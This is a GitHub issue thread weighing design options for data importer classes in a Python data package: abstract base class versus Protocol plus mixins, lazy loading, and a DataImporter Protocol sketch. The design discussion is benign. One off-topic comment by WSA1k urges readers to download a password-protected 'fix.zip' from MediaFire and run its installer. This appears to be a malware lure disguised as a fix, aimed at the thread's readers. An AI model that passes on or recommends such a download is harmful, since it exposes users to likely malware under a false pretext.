### ISSUE TITLE
Importer design

### ISSUE THREAD

**Issue by lpicci96** [ONEcampaign/bblocks_data_importers#1]
What is the appropriate design pattern and strategy to use for importer objects? What worked well with the original implementation, and what didn't work well? What benefits should we aim to preserve and what issues need to be addressed? What needs to be redefined or developed?

- [ ] Overall design approach
- [ ] Importer object structure and UI
- [ ] Caching strategy

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by lpicci96** [comment]
The current implementation of importers in bblocks uses a combination of the abstract factory method and template method  by using an abstract base class to define the common interface, and defining methods in the base class (eg `get_data`) to provide the skeleton of an algorithm but allowing concrete implementations to override the algorithm. 

The approach offers benefits - consistency and predictability in the user interface, reduction in code duplication and increased code reusability. But it has drawbacks - inflexibility by enforcing a rigid structure causes issues when there are new datasets that require different approaches or structures; difficulty refactoring if a change needs to be made to the base class; hidden logic makes it difficult to debug and makes code less readable. 

This considered, the approach should try to maintain consistency and predictability in the interface, where possible reduce code duplication without adding unnecessary complexity, and be flexible for new unknown data sources that may not conform to a rigid structure and approach

**Comment by lpicci96** [comment]
A potential alternative pattern is to use a strategy + mixin pattern. We can define a protocol to specify the methods and properties needed  for an object to be a valid implementation of the protocol, but does not require inheritance from a base class. This removes coupling and increases flexibility (loose coupling and open for extension). Because we may not know the needs for each data source and we want to emphasise the behaviour importers over strict hierarchy this may be a good option. To benefit from code reuse and remove code duplication, the Mixin pattern can be used by creating classes that add functionality eg caching taking advantage of Python's multiple inheritance. This promotes code reuse without relying on inheritance hierarchies of base classes. This promotes loose coupling and the single responsibility principle

**Comment by lpicci96** [comment]
Potential importer protocol, to replace the base class. The approach remains the same - objects are instantiated without any data, a user must call a data loader `load_data` which will either fetch and process the data from the source or get it from the cache if it is available. User will call a data getter `get_data` to get the data (as a dataframe) only after the data is loaded. To update the data in the cache an update method must be called `update_data` with the option to reload the data in the object as well.

```
class DataImporter(Protocol):
     """Protocol for Data Importer objects"""

     def load_data(self, **kwargs) -> "DataImporter":
        """Load the data from a source."""
        ...

    def update_data(self, **kwargs) -> "DataImporter":
        """Update the data from a source."""
        ...

    def get_data(self, **kwargs) -> pd.DataFrame:
        """Get the data as a Pandas DataFrame."""
        ...
```

**Benefits**: Separation of Concerns, Flexibility in loading/not data, state management, easier error handling, easier caching functionality
**Drawbacks**:  state dependency (a user must remember to call `load_data` before `get_data`), increased complexity for simple use cases (especially when only 1 fetch operation is needed)

**Comment by lpicci96** [comment]
Alternative approaches

1. **Lazy loading**
Data is fetched only when it is needed. Rather than requiring a user to call `load_data`, a user calls `get_data` directly. If the data has not been fetched yet/does not exist in memory, it is fetched on demand (by calling a `load_data` operator which is not directly exposed to the user. 
**Benefits**: simplified user interface, reduces necessary fetching (data fetched only when required), reduce state management complexity (no need to remember to call `load_data`
**Drawbacks**: potential for unexpected latency, less control over when data is fetched, increased difficulty in adding other functionality such as analytical tools. 

2. **load on instantiation**
Data is fetched when the object is instantiated. 
**Benefits**: Much simplified workflow, data is always available (no latency after the object is instantiated)
**Drawbacks**: Latency on instantiation, all data is fetched on instantiation (though not all data may be needed), added complexity when data needs to be (re)fetched after instantiation. 

Lazy loading might be the more appropriate option for this use case - compared to the current implementation and . Datasets are generally not large enough to cause significant latency, and latencies can be managed with logging. Since the functionality of the package should be kept simple to only getting data rather than adding any analytical functionality, the user interface can be simplified.

**Comment by lpicci96** [comment]
@jm-rivera open for your thoughts
